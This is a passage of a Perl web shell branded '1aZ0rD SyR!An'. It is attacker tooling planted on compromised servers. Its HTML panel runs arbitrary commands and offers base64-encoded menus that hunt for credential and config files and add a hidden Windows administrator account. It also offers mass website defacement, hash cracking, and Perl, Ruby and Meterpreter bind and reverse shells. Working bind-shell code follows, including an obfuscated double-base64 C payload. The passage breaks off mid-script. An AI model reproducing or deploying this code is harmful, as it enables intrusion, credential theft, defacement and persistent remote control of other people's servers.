- <!------ Some Info ------>
- <font size='1'><br>
- System = <sy>$os</sy>
- PHP Version = <sy>$php_v[1]</sy>
- Http Name = <sy>$ENV{'SERVER_NAME'}</sy>
- Uname = <sy>$sname</sy><br>
- PWD = <sy>$pwd</sy>
- id = <sy>$id_i</sy>
- www = <sy>$ENV{'DOCUMENT_ROOT'}</sy><br>
- server_software = <sy>$ENV{'SERVER_SOFTWARE'}</sy>
- Server Name = <sy>$host</sy>
- Server Admin = <a href = 'mailto:$ENV{'SERVER_ADMIN'}'><u><sy>$ENV{'SERVER_ADMIN'}</sy>
- </u></a><br>
- Your IP = <sy>$ENV{'REMOTE_ADDR'}</sy>
- Server IP = <a href='http://bing.com/search?q=ip:$ENV{'SERVER_ADDR'}&go=&form=QBLH&filt=all' target='_blank'><u><sy>$ENV{'SERVER_ADDR'}</sy>
- </u></a>
- [</span><a target="_blank" href="http://www.yougetsignal.com/tools/web-sites-on-web-server">Reverse IP</a>]</span>
- Date Time = <sy>$tim </sy>
- <br/>
- <!------ End Some Info ------>
- [<a href='http://www.md5decrypter.co.uk/' target='_blank'>MD5 Cracker</a>]
- [<a href='http://www.md5decrypter.co.uk/sha1-decrypt.aspx' target='_blank'>SHA1 Cracker</a>]
- [<a href='http://www.md5decrypter.co.uk/ntlm-decrypt.aspx' target='_blank'>NTLM Cracker</a>]
- <br>
- <br>
- <table bgcolor="#cccccc" width="100%">
- <tr>
- <td>
- <p dir="ltr" align="center">
- <font face="Comic Sans MS" size="5" color="#CC0000">1aZ0rD SyR!</font><font face="Comic Sans MS" size="5" color="#008000">An W3b</font><font face="Comic Sans MS" size="5" color="#808080">
- P3r11 Sh311</font><font face="Comic Sans MS"></b></div></font></p>
- <p dir="ltr" align="center"><font color="#999999" size="3">C0d3d By: LaZ0rD
- SyRiAn </font></font></p>
- </td>
- </tr>
- </table>
- [<a href="#down">Down</a>] [<a href="javascript:window.print()">Print</a>]
- </table>
- <table bgcolor="#cccccc" cellpadding='0' cellspacing='0'width="100%">
- <tr><td width="100%">
- <td colspan='2' align='center'></td></tr>
- <tr><td>
- END
- }
- ##############################################
- #---------------[ don't work ] -------------#
- ##############################################
- sub dont_work
- {
- msg_txt("[-] I am Sorry But This Don't Work On WinDows ");
- }
- ##############################################
- #---------------[ is it hex ] -------------#
- ##############################################
- sub ishex
- {
- $tmp=shift;
- if ($tmp=~/[a-f0-9]/i and $tmp!~/[g-z]/i)
- {
- return 1;
- }
- else
- {
- return 0;
- }
- }
- ##############################################
- #-----------[ HtmlSpecialChars ] -----------#
- ##############################################
- sub HtmlSpecialChars($){
- my $text = shift;
- $text =~ s/&/&/g;
- $text =~ s/"/"/g;
- $text =~ s/'/'/g;
- $text =~ s/</</g;
- $text =~ s/>/>/g;
- return $text;
- }
- sub HtmlSpecialChars_rev
- {
- my $text=shift;
- $text =~ s/&/&/g;
- $text =~ s/"/"/g;
- $text =~ s/'/'/g;
- $text =~ s/</</g;
- $text =~ s/>/>/g;
- return $text;
- }
- ##############################################
- #--------------- [ writable ] --------------#
- ##############################################
- sub writable
- {
- if (!-w shift)
- {
- return 0;
- }
- else
- {
- return 1;
- }
- }
- ##############################################
- #---------------[ HTML Main ] -------------#
- ##############################################
- if ($cmd eq "")
- {
- if ($os eq "Linux")
- {
- $cmd="ls -lia";
- }
- else
- {
- $cmd="dir"
- }
- }
- my $pwd_dir=html_var('pwd_dir');
- if ($pwd_dir)
- {
- if ($pwd_dir ne $path)
- {
- $path=$pwd_dir;
- }
- }
- print <<END;
- </form>
- <!------ Commend Line ------>
- <table width='100%'>
- <td width='30%' height='30'>
- <form name="command_line" method="POST" action= "?id=home" onSubmit="encode(command_line.cmd);encode(command_line.pwd_dir);encode(command_line.action);">
- <table width='100%' height='72' border='0' id='Box'>
- <tr>
- <td width='4%' height='21' style='background-color:$Color_1'> </td>
- <td style='background-color:$Color_2;padding-left:10px;'>Command Line </td>
- </tr>
- <tr>
- <td height='45' colspan='2'>
- <p align="center">CMD :
- <input type='text' name='cmd' id='commandLine' value='$cmd' onblur='Blur("commandLine","$cmd")' onclick='Clear("commandLine" ,"$cmd")' size='59'>
- <input type="hidden" name="action" value="cmd"><br>path :
- <input type='text' name='pwd_dir' value="$path"size='59'>
- <br>
- <input id='Execute' type='submit' value='Execute' >
- <input id='Execute0' type='submit' value='help' name="help" >
- </td>
- </tr>
- </table>
- </form>
- </td>
- <!------ Commands Alias ------>
- <td width='30%' height='30'>
- <form name="command_alias" method="POST" action= "?id=home" onSubmit="encode(command_alias.pwd_dir);encode(command_alias.action);">
- <table width='100%' height='72' border='0' id='Box'>
- <tr>
- <td width='4%' height='21' style='background-color:$Color_1'> </td>
- <td style='background-color:$Color_2;padding-left:10px;'>Commands Alias </td></tr><tr><td height='45' colspan='2'>
- <p align="center">
- END
- ######
- if ($os eq "Linux"){
- print <<END;
- <select name="cmd" size='1' >
- <option value=''>NONE</option>
- <option value='bHMgLWxh'>List dir</option>
- <option value='Y2F0IC9ldGMvaG9zdHM='>IP Addresses</option>
- <option value='Y2F0IC9wcm9jL3N5cy92bS9tbWFwX21pbl9hZGRy'>Check MMAP</option>
- <option value='bHNhdHRyIC12YQ=='>list file attributes on a Linux second extended file system</option>
- <option value='bmV0c3RhdCAtYW4gfCBncmVwIC1pIGxpc3Rlbg=='>show opened ports</option>
- <option value='ZmluZCAvIC10eXBlIGYgLXBlcm0gLTA0MDAwIC1scw=='>find all suid files</option>
- <option value='ZmluZCAuIC10eXBlIGYgLXBlcm0gLTA0MDAwIC1scw=='>find suid files in current dir</option>
- <option value='ZmluZCAvIC10eXBlIGYgLXBlcm0gLTAyMDAwIC1scw=='>find all sgid files</option>
- <option value='ZmluZCAuIC10eXBlIGYgLXBlcm0gLTAyMDAwIC1scw=='>find sgid files in current dir</option>
- <option value='ZmluZCAvIC10eXBlIGYgLW5hbWUgY29uZmlnLmluYy5waHA='>find config.inc.php files</option>
- <option value='ZmluZCAvIC10eXBlIGYgLW5hbWUgXCJjb25maWcqXCI='>find config* files</option>
- <option value='ZmluZCAuIC10eXBlIGYgLW5hbWUgXCJjb25maWcqXCI='>find config* files in current dir</option>
- <option value='ZmluZCAvIC1wZXJtIC0yIC1scw=='>find all writable folders and files</option>
- <option value='ZmluZCAuIC1wZXJtIC0yIC1scw=='>find all writable folders and files in current dir</option>
- <option value='ZmluZCAvIC10eXBlIGYgLW5hbWUgc2VydmljZS5wd2Q='>find all service.pwd files</option>
- <option value='ZmluZCAuIC10eXBlIGYgLW5hbWUgc2VydmljZS5wd2Q='>find service.pwd files in current dir</option>
- <option value='ZmluZCAvIC10eXBlIGYgLW5hbWUgLmh0cGFzc3dk'>find all .htpasswd files</option>
- <option value='ZmluZCAuIC10eXBlIGYgLW5hbWUgLmh0cGFzc3dk'>find .htpasswd files in current dir</option>
- <option value='ZmluZCAvIC10eXBlIGYgLW5hbWUgLmJhc2hfaGlzdG9yeQ=='>find all .bash_history files</option>
- <option value='ZmluZCAuIC10eXBlIGYgLW5hbWUgLmJhc2hfaGlzdG9yeQ=='>find .bash_history files in current dir</option>
- <option value='ZmluZCAvIC10eXBlIGYgLW5hbWUgLmZldGNobWFpbHJj'>find all .fetchmailrc files</option>
- <option value='ZmluZCAuIC10eXBlIGYgLW5hbWUgLmZldGNobWFpbHJj'>find .fetchmailrc files in current dir</option>
- <option value='bG9jYXRlIGh0dHBkLmNvbmY='>locate httpd.conf files</option>
- <option value='bG9jYXRlIHZob3N0cy5jb25m'>locate vhosts.conf files</option>
- <option value='bG9jYXRlIHByb2Z0cGQuY29uZg=='>locate proftpd.conf files</option>
- <option value='bG9jYXRlIHBzeWJuYy5jb25m'>locate psybnc.conf files</option>
- <option value='bG9jYXRlIG15LmNvbmY='>locate my.conf files</option>
- <option value='bG9jYXRlIGFkbWluLnBocA=='>locate admin.php files</option>
- <option value='bG9jYXRlIGNmZy5waHA='>locate cfg.php files</option>
- <option value='bG9jYXRlIGNvbmYucGhw'>locate conf.php files</option>
- <option value='bG9jYXRlIGNvbmZpZy5kYXQ='>locate config.dat files</option>
- <option value='bG9jYXRlIGNvbmZpZy5waHA='>locate config.php files</option>
- <option value='bG9jYXRlIGNvbmZpZy5pbmM='>locate config.inc files</option>
- <option value='bG9jYXRlIGNvbmZpZy5pbmMucGhw'>locate config.inc.php</option>
- <option value='bG9jYXRlIGNvbmZpZy5kZWZhdWx0LnBocA=='>locate config.default.php files</option>
- <option value='bG9jYXRlIGNvbmZpZw=='>locate config* files </option>
- <option value='bG9jYXRlIC5jb25m'>locate .conf files</option>
- <option value='bG9jYXRlIC5wd2Q='>locate .pwd files</option>
- <option value='bG9jYXRlIC5zcWw='>locate .sql files</option>
- <option value='bG9jYXRlIC5odHBhc3N3ZA=='>locate .htpasswd files</option>
- <option value='bG9jYXRlIC5iYXNoX2hpc3Rvcnk='>locate .bash_history files</option>
- <option value='bG9jYXRlIC5teXNxbF9oaXN0b3J5'>locate .mysql_history files</option>
- <option value='bG9jYXRlIC5mZXRjaG1haWxyYw=='>locate .fetchmailrc files</option>
- <option value='bG9jYXRlIGJhY2t1cA=='>locate backup files</option>
- <option value='bG9jYXRlIGR1bXA='>locate dump files</option>
- <option value='bG9jYXRlIHByaXY='>locate priv files</option>
- </select>
- END
- }else{
- my $serverip= $ENV{'SERVER_ADDR'};
- my @net= split(/[.]/,$serverip);
- my $netip = "$net[0].$net[1].$net[2].%s";
- my $scan1 = 'FOR /L %s in (1,1,255) do @ping -n 1 -w 100';
- my $scan2 ='|find "Reply"';
- my $scan = "$scan1 $netip $scan2";
- $scan=encode_base64($scan);
- print <<END;
- <select name="cmd" size='1' >
- <option value=''>NONE</option>
- <option value='RGly'>List Directory</option>
- <option value='aXBjb25maWc='>IP Addresses</option>
- <option value='bmV0c3RhdCAtYW4gfGZpbmQgTElTVEVOSU5H'>show opened ports</option>
- <option value='$scan'>Scan The Local Network</option>
- <option value='bmV0IHVzZXI='>show users</option>
- <option value='bmV0IHVzZXIgIExhWjByZCBMYVowcmQgL2FkZCA='>add user (LaZ0rd :LaZ0rd)</option>
- <option value='bmV0IGxvY2FsZ3JvdXAgYWRtaW5pc3RyYXRvcnMgTGFaMHJkIC9hZGQg'>add user LaZ0rd to administrator</option>
- <option value='ZGlyIC9zIC93IC9iIGluZGV4LnBocA=='>Find index.php in current dir</option>
- <option value='ZGlyIC9zIC93IC9iICpjb25maWcqLnBocA=='>Find *config*.php in current dir</option>
- <option value='bmV0c3RhdCAtYW4='>Show active connections</option>
- <option value='bmV0IHN0YXJ0'>Show running services</option>
- <option value='dGFza2xpc3Q='>Show Pro</option>
- <option value='bmV0IHVzZXI='>User accounts</option>
- <option value='bmV0IHZpZXc='>Show computers</option>
- <option value='YXJwIC1h'>ARP Table</option>
- <option value='aXBjb25maWcgL2FsbA=='>IP Configuration</option>
- <option value='c3lzdGVtaW5mbw=='>System Informations</option>
- <option value='Z2V0bWFj'>Get Mac Address</option>
- </select>
- END
- }
- print <<End;
- </p>
- <p align="center">
- <input type="hidden" name="action" value="cmd">
- <input type="hidden" name="pwd_dir" value="$path">
- <input id='Execute' type='submit' value='Execute' >
- </td>
- </tr>
- </table>
- </form>
- </td>
- <!--------------------------------------->
- <!------ Upload And Get Files ------>
- <tr>
- <td width='30%' height=30>
- <form name="get_upload" method="POST" action= "?id=home" onSubmit="encode_get_upload()">
- <table width='100%' height='72' border='0' id='Box'><tr>
- <td width='4%' height='21' style='background-color:$Color_1'> </td>
- <td style='background-color:$Color_2;padding-left:10px;'>Upload & Get File </td></tr><tr><td height='45' colspan='2'>
- <div id='get'>
- <input type="hidden" name="action" value="ZmlsZWdldA=="><p align="center"><input type="text" name="fileUrl" id="file_url" onblur="Blur(file_u,file_u_v);" onclick="Clear(file_u,file_u_v);" size="59" value="http://www."><select name="getType"><option value="d2dldA==">Auto</option><option value="d2dldA==">wget</option><option value="Y3VybCAtbw==">curl -o</option><option value="Z2V0">get</option><option value="bHlueCAtc291cmNl">lynx -source</option></select></div>
- <p align="center">
- <select id='action_1' onchange='Ch();'>
- <option value='fileget'>Get File Form wWw</option>
- <option value='upload'>Upload File From Your Pc</option>
- <option value='download'>Download File </option>
- </select>
- <p align="center">
- <input type="hidden" name="pwd_dir" value="$path">
- <input name='editFileSubmit' type='submit' value='Go'>
- </td></tr></table></form>
- <!------ Files & Folders Handling ------>
- <td width='30%' height=30>
- <form name="file_handling" method="POST" action= "?id=home" onSubmit="encode_file_handling();">
- <table width='100%' height='72' border='0' id='Box'><tr>
- <td width='4%' height='21' style='background-color:$Color_1'> </td>
- <td style='background-color:$Color_2;padding-left:10px;'>Files & Folders Handling </td></tr><tr><td height='45' colspan='2'>
- <div id='newName'>
- <p align="center">
- <input type="hidden" name="action" value="UmVuYW1lRmlsZQ==">
- <input type="text" name="RenameFile_a" id="commandLine4" value="File Name" onblur="Blur('commandLine4','File Name');" onclick="Clear('commandLine4','File Name');" size="40">
- <input type="text" name="RenameFile_b" id="commandLine5" value="File New Name" onblur="Blur('commandLine5','File New Name');" onclick="Clear('commandLine5','File New Name');" size="40">
- </div>
- <p align="center">
- <select name='actiontype' id='actionType' onchange='ChangeInputs();'>
- <option value='rename'>Rename</option>
- <option value='read_file'>Read File</option>
- <option value='edit_file'>Edite File</option>
- <option value='chmod'>Change Mode</option>
- <option value='delfile'>Delete File or Folder</option>
- <option value='copy'>Copy File</option>
- <option value='mkdir'>Create Folder</option>
- <option value='777'>777 Folder Finder</option>
- </select>
- <p align="center">
- <input type="hidden" name="pwd_dir" value="$path">
- <input name='editFileSubmit' type='submit' value='Do'>
- </form>
- </td></tr></table></form>
- </td></tr>
- <!------- Forbidden -------->
- <td width='30%' height='30'>
- <form name="forbid" method="POST" action= "?id=home" onSubmit="encode(forbid.pwd_dir);">
- <table width='100%' height='72' border='0' id='Box'><tr>
- <td width='4%' height='21' style='background-color:$Color_1'> </td>
- <td style='background-color:$Color_2;padding-left:10px;'>Forbidden Bypasser</td></tr><tr><td height='45' colspan='2'>
- <p align="center">
- <input type="text" name="pwd_dir" id="cd_dir" onblur="Blur('cd_dir','$path');" size="40" value="$path">
- <select name="403"><option value="RGlyZWN0b3J5SW5kZXg=">DirectoryIndex</option><option value="RGlyZWN0b3J5SW5kZXg=">HeaderName</option><option value="TXT">TXT</option><option value="NDA0">404</option><option value="UmVhZG1lTmFtZQ==">ReadmeName</option><option value="Zm9vdGVyTmFtZQ==">footerName</option></select>
- <p align="center">
- <input type="hidden" name="action" value="Zm9y">
- <input type='submit' value='Generate' name='generateForbidden'>
- </td></tr></table></form>
- </td>
- <!------- Server Shortcut -------->
- <td width='30%' height='30'>
- <form name="ser_cut" method="POST" action= "?id=home" onSubmit="encode(ser_cut.genServpath);">
- <table width='100%' height='72' border='0' id='Box'><tr>
- <td width='4%' height='21' style='background-color:$Color_1'> </td>
- <td style='background-color:$Color_2;padding-left:10px;'>Server Shortcut</td></tr><tr><td height='45' colspan='2'>
- <p align="center">
- <input type="text" name="genServpath" id="server_sho" onblur="Blur('server_sho','$path');"size="40" value="$path">
- <input type="hidden" name="action" value="dW56aXA="><p align="center">
- <input type='submit' value='Generate' name='generate'>
- </td></tr></table></form>
- </td>
- <tr>
- <!------ Scanners And Strings Tools ------>
- <td width='30%' height='30'>
- <form name="scan_str" method="POST" action= "?id=home" onSubmit="encode(scan_str.stringtool)">
- <table width='100%' height='72' border='0' id='Box'><tr>
- <td width='4%' height='21' style='background-color:$Color_1'> </td>
- <td style='background-color:$Color_2;padding-left:10px;'>Scanners And Strings Tools </td></tr><tr><td height='45' colspan='2'>
- <p align="center"> <input type='textarea' name='stringtool' id='tool' onblur="Blur('tool',evalOrEnc2());" onclick="Clear('tool',evalOrEnc2())" value='print "Hello,all";' size='59'>
- <select id='evalOrEnc' name='acti' onchange='chen_eval(evalOrEnc2());'>
- <option value='eval'>Eval Code</option>
- <option value='enc'>Encryption</option>
- <option value='analyze'>Analyze</option>
- </select>
- <br>
- <input type="hidden" name="action" value="ZXZhbA==">
- <input id='Execute1' type='submit' value='ok' >
- </td></tr></table></form>
- </td>
- <!------ Users & Domains ------>
- <td width='30%' height='30'>
- <form name="scan_str" method="POST" action= "?id=home" >
- <table width='100%' height='72' border='0' id='Box'><tr>
- <td width='4%' height='21' style='background-color:$Color_1'> </td>
- <td style='background-color:$Color_2;padding-left:10px;'> Users & Domains </td></tr><tr><td height='45' colspan='2'>
- <p align="center">
- <input type="hidden" name="action" value="dXNlcl9kb21pbg==">
- <input id='Execute1' type='submit' value='GET Users & Domains ' >
- </td></tr></table></form>
- </td>
- <tr>
- <!------- Fast Defacement -------->
- <td width='30%' height='30'>
- <form name="mass_defacement" method="POST" action= "?id=home" onSubmit="encode(mass_defacement.pwd_dir);encode(mass_defacement.massIndex);encode(mass_defacement.massFileName)">
- <table width='100%' height='72' border='0' id='Box'><tr>
- <td width='4%' height='21' style='background-color:$Color_1'> </td>
- <td style='background-color:$Color_2;padding-left:10px;'>Fast Defacement</td></tr><tr><td height='45' colspan='2'>
- <center><input type='text' name='massIndex' id='massDir' onblur='Blur("massDir","Hacked By 1aZ0rD SyR!An")' onclick='Clear("massDir","Hacked By 1aZ0rD SyR!An")' value='Hacked By 1aZ0rD SyR!An' size='70' /><input type='text' name='massFileName' id='massFileName'onblur='Blur("massFileName","index.html")' onclick='Clear("massFileName","index.html")' value='index.html' size='15' /><p><input type="text" name="pwd_dir" size="40" value="$path">
- <input type="hidden" name="action" value="bWFzcw==">
- <input type='submit' value='Deface Now' name='s'>
- </p>
- </td></tr></table></form>
- </td>
- <!------- Zone-h Mass Deface -------->
- <td width='30%' height='30'>
- <form name="zon_h" method="POST" action= "?id=home" onSubmit="encode(zon_h.hacker);">
- <table width='100%' height='72' border='0' id='Box'><tr>
- <td width='4%' height='21' style='background-color:$Color_1'> </td>
- <td style='background-color:$Color_2;padding-left:10px;'>Zone-h Mass Deface</td></tr><tr><td height='45' colspan='2'>
- <center><input type='text' name='hacker' id='zoneid' onblur='Blur("zoneid","Hacker Name")' onclick='Clear("zoneid","Hacker Name")' value='Hacker Name' size='70' />
- <input type="hidden" name="action" value="em9uZS1o"></p>
- <input type='submit' value='Deface Now' name='s'>
- </p>
- </td></tr></table></form>
- </td>
- <tr>
- <!------ Bind Port ------>
- <td width="30%" height="30">
- <form name="bin_por" method="POST" action= "?id=home" onSubmit="encode(bin_por.bind_port)">
- <input type="hidden" name="action" value="YmluZF9wb3J0">
- <table width="100%" height="72" border="0" id="Box">
- <tr>
- <td width="4%" height="21" style="background-color:$Color_1"> </td>
- <td style="background-color:$Color_2;padding-left:10px;">Bind Port </td>
- </tr>
- <tr>
- <td height="45" colspan="2">
- <p align="center">
- <input type="text" name="bind_port" id="binport" onblur='Blur("binport",4444)' onclick='Clear("binport",4444)' value="4444" size="40"></p>
- <p align="center"><select name="type">
- <option value="cGVybDE=">Perl[1]</option>
- <option value="cGVybDI=">Perl[2](Good)</option>
- <option value="cnVieQ==">Ruby</option>
- <option value="Yw==">C(Good)</option>
- <option value="aW5ldGQ=">inetd</option>
- </select> </p>
- <p align="center"> <input type="submit" value="Bind"> </p>
- </td>
- </tr>
- </table>
- </form>
- </td>
- <!------ Reverse ------>
- <td width="30%" height="30">
- <form name="rever" method="POST" action= "?id=home" onSubmit="encode(rever.ip_r);encode(rever.pwd_dir);encode(rever.re_port)">
- <input type="hidden" name="action" value="cmV2ZXJz">
- <table width="100%" height="72" border="0" id="Box">
- <tr>
- <td width="4%" height="21" style="background-color:$Color_1"> </td>
- <td style="background-color:$Color_2;padding-left:10px;">Reverse</td>
- </tr>
- <tr>
- <td height="45" colspan="2">
- <p align="center">
- <input type="text" name="ip_r" id="commandLine4" value="$ENV{'REMOTE_ADDR'}" size="40">
- <input type="hidden" name="pwd_dir" value="$path">
- <input type="text" name="re_port" id="re_por" value="Port" onblur='Blur("re_por","Port")' onclick='Clear("re_por","Port")' size="40"></p>
- <p align="center"><select name="type">
- <option value="cGVybA==">Perl[1]</option>
- <option value="cGVybDI=">Perl[2]</option>
- <option value="cGVybDM=">Perl[3]</option>
- <option value="cnVieQ==">Ruby</option>
- <option value="c2g=">telnet[sh]</option>
- </select> </p>
- <p align="center"><input type="submit" value="OK"> </p>
- </td>
- </tr>
- </table>
- </form>
- </td>
- </tr>
- <tr>
- <!------ meterpreter Bind ------>
- <td width="30%" height="30">
- <form name="meter_b" method="POST" action= "?id=home" onSubmit="encode(meter_b.bind_port);encode(meter_b.ip)">
- <input type="hidden" name="action" value="bWV0ZXJfYmluZA==">
- <table width="100%" height="72" border="0" id="Box">
- <tr>
- <td width="4%" height="21" style="background-color:$Color_1"> </td>
- <td style="background-color:$Color_2;padding-left:10px;">PHP Meterpreter -> Metasploit Bind
- Connection</td>
- </tr>
- <tr>
- <td height="45" colspan="2">
- <p align="center">
- <input type="text" name="bind_port" id="commandLine4" value="4444" size="40">
- <input type="text" name="ip" id="rhost" onblur='Blur("rhost","RHOST")' onclick='Clear("rhost","RHOST")' value="RHOST" size="40"></p>
- </p>
- <p align="center"> <input type="submit" value="connect"> </p>
- </td>
- </tr>
- </table>
- </form>
- </td>
- <!------ meterpreter Reverse ------>
- <td width="30%" height="30">
- <form name="meter_re" method="POST" action= "?id=home" onSubmit="encode(meter_re.ip_r);encode(meter_re.re_port)">
- <input type="hidden" name="action" value="bWV0ZXJfcmV2ZXJz">
- <table width="100%" height="72" border="0" id="Box">
- <tr>
- <td width="4%" height="21" style="background-color:$Color_1"> </td>
- <td style="background-color:$Color_2;padding-left:10px;">PHP Meterpreter -> Metasploit Reverse
- Connection</td>
- </tr>
- <tr>
- <td height="45" colspan="2">
- <p align="center">
- <input type="text" name="ip_r" id="commandLine4" value="$ENV{'REMOTE_ADDR'}" size="40">
- <input type="text" name="re_port" id="lport" onblur='Blur("lport","LPort")' onclick='Clear("lport","LPort")' value="LPort" size="40"></p>
- <p align="center"><input type="submit" value="OK"> </p>
- </td>
- </tr>
- </table>
- </form>
- </td>
- </tr>
- <tr>
- <!------ Brute-Force CraCk3r ------>
- <tr>
- <td width="30%" height="30">
- <form name="f5" method="POST" action= "?id=home" >
- <input type="hidden" name="action" value="Brute-Force">
- <table width="100%" height="72" border="0" id="Box">
- <tr>
- <td width="4%" height="21" style="background-color:$Color_1"> </td>
- <td style="background-color:$Color_2;padding-left:10px;">Hashz Brute-Force
- CraCker</td>
- </tr>
- <tr>
- <td height="45" colspan="2">
- <p align="center"></p>
- <p align="center"> Your Hash :
- <input type="text" name="hash" id="has" onblur='Blur("has","cfcd208495d565ef66e7dff9f98764da")' onclick='Clear("has","cfcd208495d565ef66e7dff9f98764da")' value="cfcd208495d565ef66e7dff9f98764da" size="40"></p>
- <p align="center"> The Chars :
- <input type="text" name="char" id="cha" onblur='Blur("cha","aAdx")' onclick='Clear("cha","aAdx")' value="aAdx" size="40"></p>
- <p align="center">Mini count :
- <input type="text" name="mincount" id="commandLine4" value="4" size="40"></p>
- <p align="center">Max count :
- <input type="text" name="maxcount" id="commandLine4" value="5" size="40"></p>
- <p align="center"><select name="type">
- <option>How To Use</option>
- <option>MD5</option>
- <option>SHA1</option>
- <option>SHA-256</option>
- <option>SHA-384</option>
- </select> </p>
- <p align="center"> <input type="submit" value="CraCk">
- </td>
- </tr>
- </table>
- </form>
- </td>
- <!------ SHA1 DeCoding ------>
- <td width="30%" height="30">
- <form name="f5" method="POST" action= "?id=home" >
- <input type="hidden" name="action" value="word">
- <table width="100%" height="72" border="0" id="Box">
- <tr>
- <td width="4%" height="21" style="background-color:$Color_1"> </td>
- <td style="background-color:$Color_2;padding-left:10px;">Wordz List
- Creator</td>
- </tr>
- <tr>
- <td height="45" colspan="2">
- <p align="center"></p>
- <p align="center">File Name :
- <input type="text" name="file" id="wordlis" onblur='Blur("wordlis","pass.txt")' onclick='Clear("wordlis","pass.txt")' value="pass.txt" size="40"></p>
- <p align="center">The Chars : <input type="text" name="char" id="chas" onblur='Blur("chas","aAdx")' onclick='Clear("chas","aAdx")' value="aAdx" size="40"></p>
- <p align="center">Mini count :
- <input type="text" name="mincount" id="commandLine4" value="4" size="40"></p>
- <p align="center">Mini count :
- <input type="text" name="maxcount" id="commandLine4" value="5" size="40"></p><br>
- <p align="center"><input type="submit" value="Generate">
- </td>
- </tr>
- </table>
- </form>
- </td>
- <tr>
- <!-------EnD---->
- <sy><br> </table> <table bgcolor="#cccccc" width="100%">
- <tr>
- <td width="100%">[<a href="#top">TOP</a></sy>] <center>
- End
- CopyRight;
- ##############################################
- #-------------- [ Bind Port ] ---------------#
- ##############################################
- our ($c,$SHELL,$LISTEN_PORT,$protocol,$pid,$ruby,$GET_varetd,$p,$system,$target,$iaddr,$paddr,$proto,$sh,$exe);
- if ($bind_perl1 eq "ok")
- {
- use IO::Socket::INET;
- while($c=new IO::Socket::INET(LocalPort,$bind_port,Reuse,1,Listen)->accept){$~->fdopen($c,"w");print" ############################ \n ###### [ 1aZ0rD SH311] ##### \n ############################ \n";STDIN->fdopen($c,"r");system$_ while<>}
- }
- ##############################################
- #-------------- [ Bind Port 2]---------------#
- ##############################################
- if ($bind_perl2 eq "ok")
- {
- $SHELL="/bin/bash -i";
- $LISTEN_PORT=$bind_port;
- use Socket;
- $protocol=getprotobyname('tcp');
- socket(S,&PF_INET,&SOCK_STREAM,$protocol) || print "Cant create socket\n";
- setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
- bind(S,sockaddr_in($LISTEN_PORT,INADDR_ANY)) || print "Cant open port\n";
- listen(S,3) || print "Cant listen port\n";
- while(1)
- {
- accept(CONN,S);
- if(!($pid=fork))
- {
- print "Cannot fork" if (!defined $pid);
- open STDIN,"<&CONN";
- open STDOUT,">&CONN";
- open STDERR,">&CONN";
- print CONN " ############################ \n ###### [ 1aZ0rD SH311] ###### \n ############################ \n";
- system $SHELL || print CONN "Cant execute $SHELL\n";
- close CONN;
- exit 0;
- }
- }
- }
- ##############################################
- #------------ [ Bind Port Ruby ] ------------#
- ##############################################
- if ($bind_ruby eq "ok")
- {
- $ruby = `ruby -rsocket -e 'exit if fork;s=TCPServer.new("$bind_port");while(c=s.accept);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end;end'`;
- }
- ##############################################
- #------------- [ Bind Port C ] -------------#
- ##############################################
- if ($bind_c eq"ok")
- {
- use MIME::Base64;
- $port=$bind_port;
- $bind_c="STJsdVkyeDFaR1VnUEhOMFpHbHZMbWcrRFFvamFXNWpiSFZrWlNBOGMzUnlhVzVuTG1nK0RRb2phVzVqYkhWa1pTQThjM2x6TDNSNWNHVnpMbWcrRFFvamFXNWpiSFZrWlNBOGMzbHpMM052WTJ0bGRDNW9QZzBLSTJsdVkyeDFaR1VnUEc1bGRHbHVaWFF2YVc0dWFENE5DaU5wYm1Oc2RXUmxJRHhsY25KdWJ5NW9QZzBLYVc1MElHMWhhVzRvWVhKbll5eGhjbWQyS1EwS2FXNTBJR0Z5WjJNN0RRcGphR0Z5SUNvcVlYSm5kanNOQ25zZ0lBMEtJR2x1ZENCemIyTnJabVFzSUc1bGQyWmtPdzBLSUdOb1lYSWdZblZtV3pNd1hUc05DaUJ6ZEhKMVkzUWdjMjlqYTJGa1pISmZhVzRnY21WdGIzUmxPdzBLSUdsbUtHWnZjbXNvS1NBOVBTQXdLU0I3SUEwS0lISmxiVzkwWlM1emFXNWZabUZ0YVd4NUlEMGdRVVpmU1U1RlZEc05DaUJ5WlcxdmRHVXVjMmx1WDNCdmNuUWdQU0JvZEc5dWN5aGhkRzlwS0dGeVozWmJNVjBwS1RzTkNpQnlaVzF2ZEdVdWMybHVYMkZrWkhJdWMxOWhaR1J5SUQwZ2FIUnZibXdvU1U1QlJFUlNYMEZPV1NrN0lBMEtJSE52WTJ0bVpDQTlJSE52WTJ0bGRDaEJSbDlKVGtWVUxGTlBRMHRmVTFSU1JVRk5MREFwT3cwS0lHbG1LQ0Z6YjJOclptUXBJSEJsY25KdmNpZ2ljMjlqYTJWMElHVnljbTl5SWlrN0RRb2dZbWx1WkNoemIyTnJabVFzSUNoemRISjFZM1FnYzI5amEyRmtaSElnS2lrbWNtVnRiM1JsTENBd2VERXdLVHNOQ2lCc2FYTjBaVzRvYzI5amEyWmtMQ0ExS1RzTkNpQjNhR2xzWlNneEtRMEtJQ0I3RFFvZ0lDQnVaWGRtWkQxaFkyTmxjSFFvYzI5amEyWmtMREFzTUNrN0RRb2dJQ0JrZFhBeUtHNWxkMlprTERBcE93MEtJQ0FnWkhWd01paHVaWGRtWkN3eEtUc05DaUFnSUdSMWNESW9ibVYzWm1Rc01pazdEUW9nSUNCemVYTjBaVzBvSW1WamFHOGdkMlZzWTI5dFpTQjBieUJNWVZvd2NrUWdVM2xTYVVGdUlITm9aV3hzSUNZbUlDOWlhVzR2WW1GemFDQXRhU0lwT3cwS0lDQjlEUW9nZlEwS2ZRMEthVzUwSUdOb2NHRnpjeWhqYUdGeUlDcGlZWE5sTENCamFHRnlJQ3BsYm5SbGNtVmtLU0I3RFFwcGJuUWdhVHNOQ21admNpaHBQVEE3YVR4emRISnNaVzRvWlc1MFpYSmxaQ2s3YVNzcktTQU5DbnNOQ21sbUtHVnVkR1Z5WldSYmFWMGdQVDBnSjF4dUp5a05DbVZ1ZEdWeVpXUmJhVjBnUFNBblhEQW5PeUFOQ21sbUtHVnVkR1Z5WldSYmFWMGdQVDBnSjF4eUp5a05DbVZ1ZEdWeVpXUmJhVjBnUFNBblhEQW5PdzBLZlEwS2FXWWdLQ0Z6ZEhKamJYQW9ZbUZ6WlN4bGJuUmxjbVZrS1NrTkNuSmxkSFZ5YmlBd093MEtmUT09";
- $bind_c=decode_base64($bind_c);
- $bind_c=decode_base64($bind_c);
- $filename="bind.c";
